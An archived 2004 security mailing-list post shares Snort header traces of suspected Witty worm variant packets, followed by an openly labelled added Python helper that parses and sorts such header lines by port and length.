Security Incidents mailing list archives
RE: new variant of witty worm ????
From: Steven Trewick <STrewick () joplings co uk>
Date: Wed, 24 Mar 2004 15:30:50 -0000
(Packet dump to follow ASAP)
As promised, here are my Snort traces for the weird packets that look very much like mutated/mangled versions of the 'witty' worm. There are two of the 'variant' packets, then one which looks like the same traffic that we saw on Saturday (although I have not had time to confirm this yet).

03/22-21:36:31.155369 211.99.223.42:1045 -> 192.168.0.88:1434 UDP TTL:105 TOS:0x0 ID:35759 IpLen:20 DgmLen:404 Len: 376
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

03/22-22:26:10.414371 128.11.41.149:2386 -> 192.168.0.88:1434 UDP TTL:109 TOS:0x0 ID:1650 IpLen:20 DgmLen:404 Len: 376

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

03/22-22:31:15.196762 155.69.109.158:4000 -> 192.168.0.88:44802 UDP TTL:101 TOS:0x0 ID:2427 IpLen:20 DgmLen:840 Len: 812

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
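A small triage helper for Snort header lines like the ones in this post, added here as an example and not code from the original message or its author. It assumes the one-line Snort header layout shown above, and its two labels are heuristics taken from the ports and lengths of these three captured packets rather than from any published signature.

```python
import re
from dataclasses import dataclass
from typing import Dict, Optional

# One-line Snort packet header as printed in the post, e.g.
# 03/22-21:36:31.155369 211.99.223.42:1045 -> 192.168.0.88:1434 UDP TTL:105 TOS:0x0 ID:35759 IpLen:20 DgmLen:404 Len: 376
HEADER_RE = re.compile(
    r"(?P<ts>\d\d/\d\d-\d\d:\d\d:\d\d\.\d+)\s+"
    r"(?P<src>[\d.]+):(?P<sport>\d+)\s+->\s+(?P<dst>[\d.]+):(?P<dport>\d+)\s+"
    r"(?P<proto>[A-Z]+)\s+TTL:(?P<ttl>\d+)\s+TOS:0x(?P<tos>[0-9A-Fa-f]+)\s+ID:(?P<ipid>\d+)\s+"
    r"IpLen:(?P<iplen>\d+)\s+DgmLen:(?P<dgmlen>\d+)\s+Len:\s*(?P<plen>\d+)"
)

@dataclass
class UdpHeader:
    ts: str
    src: str
    sport: int
    dst: str
    dport: int
    ttl: int
    dgmlen: int   # total IP datagram length
    plen: int     # UDP payload length as Snort reports it ("Len:")

def parse_header(line: str) -> Optional[UdpHeader]:
    """Parse one Snort header line; returns None for non-matching or non-UDP lines."""
    m = HEADER_RE.search(line)
    if not m or m["proto"] != "UDP":
        return None
    return UdpHeader(m["ts"], m["src"], int(m["sport"]), m["dst"], int(m["dport"]),
                     int(m["ttl"]), int(m["dgmlen"]), int(m["plen"]))

def classify(h: UdpHeader) -> str:
    """Heuristic labels (assumption: derived only from the three headers in the post)."""
    if h.dgmlen != 20 + 8 + h.plen:   # DgmLen must be IP header + UDP header + payload
        return "inconsistent-length"
    if h.sport == 4000 and h.dport != 1434:
        return "witty-shape"          # Witty sends from source port 4000 to a random destination port
    if h.dport == 1434 and h.plen == 376:
        return "udp1434-376"          # the 376-byte UDP/1434 packets the post calls 'variants'
    return "other"

def triage(log_text: str) -> Dict[str, int]:
    """Count each label across every parseable header line in a Snort log."""
    counts: Dict[str, int] = {}
    for line in log_text.splitlines():
        h = parse_header(line)
        if h:
            label = classify(h)
            counts[label] = counts.get(label, 0) + 1
    return counts

# Header lines copied from the post; the hex payloads are not needed for this triage.
SAMPLE_LOG = """\
03/22-21:36:31.155369 211.99.223.42:1045 -> 192.168.0.88:1434 UDP TTL:105 TOS:0x0 ID:35759 IpLen:20 DgmLen:404 Len: 376
03/22-22:26:10.414371 128.11.41.149:2386 -> 192.168.0.88:1434 UDP TTL:109 TOS:0x0 ID:1650 IpLen:20 DgmLen:404 Len: 376
03/22-22:31:15.196762 155.69.109.158:4000 -> 192.168.0.88:44802 UDP TTL:101 TOS:0x0 ID:2427 IpLen:20 DgmLen:840 Len: 812
"""
```

Running `triage(SAMPLE_LOG)` separates the two 1434 packets from the source-port-4000 one, which is the split the post asks readers to confirm.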